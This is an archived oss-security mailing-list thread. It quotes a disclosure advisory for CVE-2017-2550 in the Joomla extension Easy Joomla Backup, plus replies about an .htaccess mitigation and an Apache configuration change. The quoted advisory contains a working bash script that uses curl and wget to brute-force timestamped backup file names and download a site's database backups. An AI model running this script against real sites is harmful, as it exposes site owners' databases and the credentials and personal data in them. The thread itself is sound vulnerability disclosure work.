'Re: [oss-security] Joomla extension Easy Joomla Backup v3.2.4 database backup exposure'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       oss-security
Subject:    Re: [oss-security] Joomla extension Easy Joomla Backup v3.2.4 database backup exposure
From:       "Larry W. Cashdollar" <larry0 () me ! com>
Date:       2017-09-28 16:05:40
Message-ID: 28E19EE5-7EC0-4712-80CE-5D2AD4C4B932 () me ! com
[Download RAW message or body]

Hi David,

This is correct, hardened shared hosting platforms won't be vulnerable to this attack.

I've now updated the configuration on my lab Ubuntu system by changing apache2.conf:

# diff -Nur orig apache2.conf 
--- orig	2017-09-28 12:02:13.674668975 -0400
+++ apache2.conf	2017-09-28 11:47:50.898322778 -0400
@@ -163,7 +163,7 @@
 
 <Directory /var/www/>
 	Options Indexes FollowSymLinks
-	AllowOverride None
+	AllowOverride All
 	Require all granted
 </Directory>

Thanks,
Larry

> On Sep 28, 2017, at 9:09 AM, David Jardin <david.jardin@community.joomla.org> wrote:
> 
> It's worth to mention that the extension has a default .htaccess file with a „deny from \
> all" in the backup directory, that will mitigate the described attack on pretty much any \
> standard shared-hosting platform that I'm aware of. 
> 
> 
> 
> Am 28. September 2017 um 14:37:20, Larry W. Cashdollar (larry0@me.com) schrieb:
> 
> > Title: Joomla extension Easy Joomla Backup v3.2.4 database backup exposure 
> > Author: Larry W. Cashdollar, @_larry0 
> > Date: 2017-09-07 
> > CVE-ID:[CVE-2017-2550] 
> > Download Site: https://joomla-extensions.kubik-rubik.de/ejb-easy-joomla-backup 
> > Vendor: kubik-rubik 
> > Vendor Notified: 2017-09-07 
> > Vendor Contact: 
> > Advisory: http://www.vapidlabs.com/advisory.php?v=200 
> > Description: Easy Joomla Backup creates 'old-school' backups without any frills. 
> > Vulnerability: 
> > The software creates a copy of the backup in the web root. The file name is easily \
> > guessable as it's just a time stamp:  
> > http://example.com/administrator/components/com_easyjoomlabackup/backups/DOMAIN_YEAR-MONTH-DAY_H-M-S.zip \
> >  
> > Exploit Code: 
> > • #!/bin/bash 
> > • #Larry W. Cashdollar, @_larry0 9/7/2017 
> > • #Bruteforce download backups for Joomla Extension Easy Joomla Backup v3.2.4 
> > • #https://joomla-extensions.kubik-rubik.de/ejb-easy-joomla-backup 
> > • MONTH=09 
> > • DAY=07 
> > • YEAR=2017 
> > • Z=0 
> > • #May need to set the DOMAIN to $1 the target depending on how WP is configured. 
> > • DOMAIN=192.168.0.163 
> > •  
> > • echo "Scanning website for available backups:" 
> > • for y in `seq -w 0 23`; do 
> > • for x in `seq -w 0 59`; do 
> > • Y=`echo "scale=2;($Z/86000)*100"|bc`; 
> > • echo -ne "\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b \
> > \b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b \
> > \b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b$CPATH $Y%"  \
> > • for z in `seq -w 0 59`; do  • Z=$(( $Z + 1 )); 
> > • CPATH="http://$1/administrator/components/com_easyjoomlabackup/backups/"$DOMAIN"_"$YEAR"-"$MONTH"-"$DAY"_"$y"-"$x"-"$z".zip"; \
> >  • RESULT=`curl -s --head $CPATH|grep 200`; 
> > • if [ -n "$RESULT" ]; then 
> > • echo "" 
> > • echo "[+] Location $CPATH Found"; 
> > • echo "[+] Received $RESULT"; 
> > • echo "Downloading......"; 
> > • wget $CPATH 
> > • fi; 
> > • done 
> > • done 
> > • done 
> > • echo "Completed."
> -- 
> Kind Regards,
> David Jardin


[prev in list] [next in list] [prev in thread] [next in thread]
Configure | About | News | Add a list | Sponsored by KoreLogic